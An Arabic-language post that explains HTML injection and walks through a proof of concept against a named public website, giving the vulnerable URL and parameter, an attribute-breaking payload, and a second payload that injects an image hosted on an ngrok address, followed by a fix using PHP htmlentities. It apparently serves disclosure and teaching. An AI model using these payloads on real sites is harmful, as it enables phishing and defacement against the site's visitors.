شرح طريقة اكتشاف ثغرة HTML Injection في موقع https://techbeacon.com ماهي ثغرة HTML Injection ؟ تحدث الثغرة عندما لايتعامل الموقع بشكل صحيح مع البيانات التي يقدمها المستخدم اي لايقوم بعملية التحقق والفلترة مما يعرض الموقع الى حقن اكواد ضارة عادة ما يتم استخدام هذه الثغرة في الهندسة الاجتماعية والتصيد الاحتيالي, يتم استغلال الثغرة عن طريق التلاعب بمحتوى الموقع وحقن اكواد ونصوص في الصفحة وتغيير شكلها. خطوات اكتشاف ثغرة HTML Injection في موقع https://techbeacon.com : 1. نقوم بفتح الرابط التالي : كود: https://techbeacon.com/enterprise-it/machine-learning-cloud-how-it-can-help-you-right-now?amp= 2. نقوم بحقن الكود التالي في الباراميتر amp : كود: "><h1>HTML Injection</h1> POC1 : Proof OF Concept كود: https://techbeacon.com/enterprise-it/machine-learning-cloud-how-it-can-help-you-right-now?amp="><h1>HTML Injection</h1> Source Code POC2 حقن صورة في الموقع : كود: https://techbeacon.com/enterprise-it/machine-learning-cloud-how-it-can-help-you-right-now?amp="></div><center><h1>HTML Injection</h1><br><img src="https://111697rt098e.ngrok.io/POC.jpg"></center> خطر الثغرة : تستخدم في التصيد الاحتيالي الاسائة الى زوار الموقع تشويه الموقع وتغيير محتواه كيف يتم اصلاح الثغرة : الطريقة سهله جداً هي عمل فلتره للبيانات المارة بين حقول البيانات, و هناك دوال في لغة php متخصصة لهذا الأمر, مثل دالة htmlentities ماهي دالة htmlentities ؟ تقوم هذه الدالة بفلترة البيانات المارة الى الموقع ولن يتم تنفيذ اي كود ضار. كود: <?php echo htmlentities($_GET['url']); ?> المراجع :https://www.acunetix.com/vulnerabilities/web/html-injection
